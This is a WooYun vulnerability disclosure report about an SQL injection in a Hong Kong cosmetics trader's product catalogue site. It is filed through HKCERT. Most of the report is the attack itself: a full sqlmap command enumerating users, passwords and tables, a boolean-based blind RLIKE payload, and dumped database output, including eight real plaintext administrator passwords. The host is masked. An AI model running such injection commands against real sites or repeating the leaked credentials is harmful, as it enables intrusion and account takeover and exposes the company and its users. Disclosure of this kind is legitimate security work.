当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156881

漏洞标题:莎宝国际贸易有限公司主站存在SQL注射漏洞(4W多网站日志+用户明文密码)(香港地區)

相关厂商:莎宝国际贸易有限公司

漏洞作者: 路人甲

提交时间:2015-12-01 11:35

修复时间:2016-01-16 10:54

公开时间:2016-01-16 10:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开

简要描述:

全球品牌汇聚,扎根香港二十六年
莎宝国际贸易有限公司创立已二十六年,
开业时至今零售批发之国际品牌超过五佰多个,各种系列产品多达数千种,
另外有多种独家代理之品牌,近年来更引入多个韩国品牌配合新兴市场需要。
莎宝国际拥有二十多年护肤品及化妆品销售丰富经验,
现已在中、港、澳及亚洲地区发展成为我们批发合作网路,近年开发至俄罗斯及东欧地区。
极具竞争力的批发价及与时并进的敏锐市场触觉,以及不断更新产品,以配合各类客户之不同需求。
欢迎有意投身美容护肤批发零售创业之人士亲临本公司参观选购,公司定必尽心为你服务。
新目标 支持年青人创业计划
回馈社会,帮助及鼓励年青人用二十万成本创业。
为有志创业的年青人提供免费课程,教授美容化妆品知识及销售技巧。以有限资金达成创业梦想。
欢迎加盟莎宝国际
随著现今营商环境的转变, 我们的目标是通过加盟平台, 将莎宝产业链推向全世界。
更可让更多有志创业者发展美容业。

详细说明:

地址:http://**.**.**.**/sc_webcat/ecat/product_view.php?lang=3&id=526

$ python sqlmap.py -u "http://**.**.**.**/sc_webcat/ecat/product_view.php?lang=3&id=526" -p id --technique=B --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


| tbl_audit_log                         | 44133   |


Database: sapocatdb
Table: usertable
[8 entries]
+---------------+
| user_password |
+---------------+
| 2008catalog   |
| admin2008     |
| Chitahm2014   |
| Karine6100    |
| Queenie6100   |
| Sunny2014     |
| Wtok2011      |
| Wtok2011      |
+---------------+

漏洞证明:

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: lang=3&id=526 RLIKE (SELECT (CASE WHEN (7574=7574) THEN 526 ELSE 0x28 END))
---
web application technology: PHP 5.2.5, Apache 1.3.37
back-end DBMS: MySQL >= 5.0.0
current user:    'sapocat@localhost'
current user is DBA:    False
database management system users [1]:
[*] 'sapocat'@'localhost'
Database: sapocatdb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| tbl_temp_trans_header                 | 10515469 |
| tbl_browse_count                      | 8586346 |
| tbl_audit_log                         | 44133   |
| tbl_trans_detail                      | 8999    |
| tbl_keyword_search                    | 7910    |
| product_browse                        | 1907    |
| tbl_trans_bp                          | 1445    |
| tbl_customer                          | 1379    |
| product                               | 871     |
| image                                 | 852     |
| tbl_product_inventory                 | 722     |
| tbl_shipment                          | 596     |
| tbl_inv                               | 401     |
| category                              | 386     |
| tbl_product_qty                       | 373     |
| tbl_country                           | 239     |
| tbl_number_generation                 | 90      |
| content                               | 20      |
| tbl_exchange_rate                     | 14      |
| tbl_currency                          | 12      |
| tbl_gift                              | 10      |
| tbl_shipping_charge                   | 9       |
| usertable                             | 8       |
| tbl_redemption_detail                 | 7       |
| tbl_redemption_order                  | 7       |
| tbl_content_category                  | 2       |
| tbl_cust_group                        | 2       |
| description                           | 1       |
| tbl_color                             | 1       |
| tbl_company                           | 1       |
| tbl_coupon                            | 1       |
| tbl_email_package                     | 1       |
| tbl_form                              | 1       |
| tbl_function_access                   | 1       |
| tbl_ip                                | 1       |
| tbl_ip_skip_count                     | 1       |
| tbl_news                              | 1       |
| tbl_size                              | 1       |
| tbl_style                             | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1644    |
| STATISTICS                            | 156     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126     |
| COLLATIONS                            | 126     |
| TABLES                                | 87      |
| KEY_COLUMN_USAGE                      | 69      |
| TABLE_CONSTRAINTS                     | 69      |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 6       |
| SCHEMATA                              | 2       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: sapocatdb
Table: tbl_customer
[1 column]
+---------------+
| Column        |
+---------------+
| cust_password |
+---------------+
Database: sapocatdb
Table: usertable
[1 column]
+---------------+
| Column        |
+---------------+
| user_password |
+---------------+
Database: sapocatdb
Table: usertable
[8 entries]
+---------------+
| user_password |
+---------------+
| 2008catalog   |
| admin2008     |
| Chitahm2014   |
| Karine6100    |
| Queenie6100   |
| Sunny2014     |
| Wtok2011      |
| Wtok2011      |
+---------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-12-02 10:53

厂商回复:

Referred to related parties.

最新状态:

暂无